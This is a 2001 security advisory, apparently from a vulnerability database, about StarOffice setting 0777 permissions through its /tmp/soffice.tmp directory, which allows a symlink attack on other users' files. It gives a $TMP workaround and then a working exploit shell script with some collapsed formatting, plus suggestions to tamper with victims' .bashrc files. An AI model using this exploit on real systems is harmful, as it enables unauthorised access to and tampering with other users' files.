HeliSec: StarOffice symlink exploit

2001-02-20T00:00:00
ID SECURITYVULNS:DOC:1299
Type securityvulns
Reporter Securityvulns
Modified 2001-02-20T00:00:00

Description

    - = Helios Security and Administration = -

    Hi everyone,

    StarOffice creates a temporary directory in /tmp called soffice.tmp,

with permissions 0777. Into this directory other temporary files are creates, with the format: svZZZZ.tmp, where ZZZZ in a four or five digits number.

    StarOffice not only create the /tmp/soffice.tmp directory with

permissions 0777, but also chmod() it sometimes when StarOffice is runing afterwards. If any user create a symbolic link from /tmp/soffice.tmp to any file owned by other user, when this last user run StarOffice the target of the link will become 0777. So, if the directory of the target file is accessible by the maliciosous user that created the symlink, he can do whatever he wants with the file. A few ways to exploit this is:

    - to modify shell start-up files (as .profile, .bashrc, .cshrc, etc.)

to execute whatever the hackers wants next time victim logs in. - to gain access to private files with sensitive information, as passwords files, mail spool files, etc. - a lot of more evil acts.

    StarOffice no give error message or such when it change the

permissions of the target file, so from the victim point of view: all is going right ;-)

    Requeriments:

    - Access to the targe file directory needed.
    - The target file must NOT be executable.

    Fix:

    One way to fix the problem is to create a directory inside your

home directory which is inaccessible to anyone but yourself (permissions 700), called tmp. Then insert an entry in your login start-up file to set the $TMP environment variable to $HOME/tmp, so it will direct StarOffice to use your temporary directory, rather than the system /tmp. Something like this (in bash):

    [wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP
    (not permanent)
    or modify the .bash_profile adding TMP=$HOME/tmp and including this

variable in the export.

    Here is the xploit code, to make sure that this will work, run first

staroffice, so you will become owner of /tmp/soffice.tmp, necessary to remove it and create the symlink.

!/bin/sh

SOFFICE="/tmp/soffice.tmp" TARGETFILE=$1

if [ $# != 1 ]; then echo echo " - = HeliSec - Helios Security and Administration = -" echo "Usage : " echo "./soffice.sh <file>" echo "Set 0777 permissions to any file (access to the directory of the file needed)" echo " JeT Li -The Wushu Master-" exit fi

if [ ! -f ${TARGETFILE} ]; then echo "Target file must exist" exit fi

rm -rf ${SOFFICE} ln -sn ${TARGETFILE} ${SOFFICE} echo echo "Symbolik link done ..." echo

perl -e '$a=ps aux | grep office; $a =~ /soffice\.bin/ ? print "StarOffice is running on this machine ... wait a minutes and the permissions will have been set.\n" : print "StarOffice is not running on this machine ...you may wait for the signal (not recommended) or CTRL+C the program; when the user run StarOffice the permissions will be set automaticly\n";'

while : do if [ ls -al ${TARGETFILE} | awk &#39;{printf $1}&#39; = "-rwxrwxrwx" ]; then echo echo "Permissions set succesfully ... good luck ;-)" echo echo "- = HeliSec - Helios Security and Administration = -" echo " JeT Li -The Wushu Master-" exit fi done

    Cheers,

                                    JeT Li  -The Wushu Master-

Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com